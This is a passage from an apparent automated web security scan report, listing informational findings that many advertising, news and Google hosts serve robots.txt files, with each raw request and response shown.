GET /robots.txt HTTP/1.0
Host: blogs.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 23 Apr 2011 08:39:43 GMT
ETag: "69a859d-8e-4a191ea7971c0"
Accept-Ranges: bytes
Content-Length: 142
X-Cachetype: Cached-with-(null)
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/wp-admin/
Disallow: /private/
Disallow: /article-comments/
SITEMAP: http://blogs.reuters.com/sitemap-news.xml

26.18. http://bookmarks.yahoo.com/myresults/bookmarklet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bookmarks.yahoo.com
Path:	/myresults/bookmarklet

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bookmarks.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:00 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 24 Apr 2007 10:06:12 GMT
Accept-Ranges: bytes
Content-Length: 24
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.19. http://c.brightcove.com/services/viewer/federated_f9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 19:56:42 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: text/plain
Content-Length: 64
Date: Sun, 04 Sep 2011 01:06:10 GMT
Connection: keep-alive
Server:

User-agent: *
Disallow: /
Allow: /services/viewer/federated_f9*

26.20. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c5.zedo.com
Path:	/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "37c4e0-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1593842807
Date: Sun, 04 Sep 2011 01:22:05 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.21. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "296db4-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:04:27 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.22. http://cdn.gigya.com/js/socialize.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/js/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:42:57 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.23. http://cdn.optmd.com/V2/89733/235451/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/89733/235451/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:12 GMT
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 04 Sep 2011 01:06:31 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.25. https://cdns.gigya.com/gs/SafariIDsProxy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdns.gigya.com
Path:	/gs/SafariIDsProxy.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdns.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:15 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.26. http://charlotteobserver.adperfect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://charlotteobserver.adperfect.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: charlotteobserver.adperfect.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:20 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.27. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.28. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:22:19 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

26.30. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

26.31. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delivery.sprint.com
Path:	/m/p/nxt/reg/cmb/generic.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: delivery.sprint.com

Response

HTTP/1.1 200 OK
Content-Length: 226
Content-Type: text/plain
Last-Modified: Wed, 31 Aug 2011 14:48:04 GMT
Accept-Ranges: bytes
ETag: "6f4511fdec67cc1:1de6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:23 GMT
Connection: close

User-agent: *
Disallow: /
Noindex: /m/p/tim/
Noindex: /m/p/syn/
Noindex: /m/p/nxt/ftaf/
Noindex: /m/u/nxt/nascar/
Noindex: /m/u/nex/

User-agent: googlebot
Allow: /m/p/mtv/

User-agent: yah
...[SNIP]...

26.32. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:26 GMT
Server: Apache
Last-Modified: Sat, 03 Sep 2011 01:08:38 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=274 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=10000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.33. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:22:28 GMT
Expires: Sun, 04 Sep 2011 01:22:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

26.34. http://dw.com.com/clear/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/c.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dw.com.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:51 GMT
Server: Apache/2.0
Last-Modified: Fri, 26 Aug 2011 16:08:00 GMT
Accept-Ranges: bytes
Content-Length: 854
Cache-Control: max-age=14400
Expires: Sun, 04 Sep 2011 04:53:51 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=363, max=717
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/third_party/apache2/configs/dw/dwcomcom/robots.txt,v $
# $Revision: 1.2 $
User-agent: *
Disallow: /Ads/
Disallow: /redir/
Disallow: /rubicsclk/
# Disallow: /i/ is removed per 1907
...[SNIP]...

26.35. http://espn.go.com/dallas/ncf/preview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://espn.go.com
Path:	/dallas/ncf/preview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: espn.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/plain
Last-Modified: Mon, 07 Mar 2011 22:09:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N722
Cache-Expires: Sun, 04 Sep 2011 01:25:39 GMT
Content-Length: 712

# robots.txt for Disallow: /

User-agent: *
Disallow: /cgi
Disallow: /ad/
Disallow: /espnradio/podcast/feeds/easports/
Disallow: /members/
Disallow: *print?id
Disallow: /travel/passport/event
...[SNIP]...

26.36. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feedburner.google.com

Response

26.37. http://findnsave.sacbee.com/api/groupon.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://findnsave.sacbee.com
Path:	/api/groupon.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: findnsave.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:29 GMT
Connection: close
Content-Length: 2329

User-agent: *
Sitemap: http://findnsave.sacbee.com/sitemap.xml
User-agent: *
Disallow: /shared/AddShoppingList.aspx
Disallow: /shared/ViewShoppingList.aspx
Disallow: /shared/popup.aspx
Disallow
...[SNIP]...

26.38. http://friendfeed.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://friendfeed.com
Path:	/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Sun, 04 Sep 2011 01:22:33 GMT
Content-Type: text/plain
Content-Length: 91
Last-Modified: Mon, 23 May 2011 22:26:34 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /account/
Disallow: /iphone/
Disallow: /connect
Disallow: /search?

26.39. http://funds.reuters.com/lipper/retail/reuters/overview.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://funds.reuters.com
Path:	/lipper/retail/reuters/overview.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: funds.reuters.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:34 GMT
Content-Length: 230
Content-Type: text/plain
Last-Modified: Thu, 15 Jun 2006 21:08:37 GMT
Accept-Ranges: bytes
ETag: "bcad60debf90c61:1876a"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET

User-Agent: *
Disallow: /
Disallow: /lipper/retail/reuters/researchflows.asp?*
Disallow: /lipper/retail/reuters/researchmarket.asp?*
Disallow: /retail/reuters/researchflows.asp?*
Disallow: /retai
...[SNIP]...

26.40. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

26.41. https://google.com/accounts/Logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://google.com
Path:	/accounts/Logout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:37 GMT
Expires: Sun, 04 Sep 2011 01:22:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.42. http://googleads.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 23:16:36 GMT
Expires: Sun, 04 Sep 2011 23:16:36 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 7561

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.43. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: groups.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:43 GMT
Expires: Sun, 04 Sep 2011 01:22:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.44. http://images.google.com/support/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/support/bin/answer.py

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:45 GMT
Expires: Sun, 04 Sep 2011 01:22:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.45. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.46. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/the-sacramento-bee-for-ipad/id446757012

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 18 Aug 2011 15:27:25 GMT
ETag: "d1-4aac93ff4d140"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/plain
Cache-Control: public, no-transform, max-age=189
Date: Sun, 04 Sep 2011 01:22:46 GMT
Connection: close
X-Apple-Partner: origin.0

User-agent: *
Disallow: /WebObjects/MZFastFinance.woa
Disallow: /WebObjects/MZFinance.woa
Disallow: /WebObjects/MZPersonalizer.woa
Disallow: /WebObjects/MZSidebar.woa
Disallow: /WebObjects/MZStoreElem
...[SNIP]...

26.47. http://jlinks.industrybrains.com/jsct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 00:44:43 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.48. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:43:35 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.49. http://legolas.nexac.com/lgalt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/lgalt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: legolas.nexac.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:57 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:21 GMT
ETag: "1ad0152-1b-49f79d177ef40"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.50. http://links.industrybrains.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://links.industrybrains.com
Path:	/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: links.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:49 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:22:49 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.51. http://load.exelator.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1277288947"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 01:10:57 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-3

User-agent: *
Disallow: /

26.52. https://mail.google.com/mail/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mail.google.com
Path:	/mail/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mail.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:22:51 GMT
Expires: Sun, 04 Sep 2011 01:22:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.53. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps-api-ssl.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Sun, 04 Sep 2011 01:22:52 GMT
Expires: Sun, 04 Sep 2011 01:22:52 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.54. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

26.55. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:10 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "309122-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www376
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.56. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:23:03 GMT
Expires: Sun, 04 Sep 2011 01:23:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.57. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nextelonline.nextel.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 04 Sep 2011 00:45:25 GMT
Content-length: 148
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:59 GMT
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/

26.58. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "131248-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
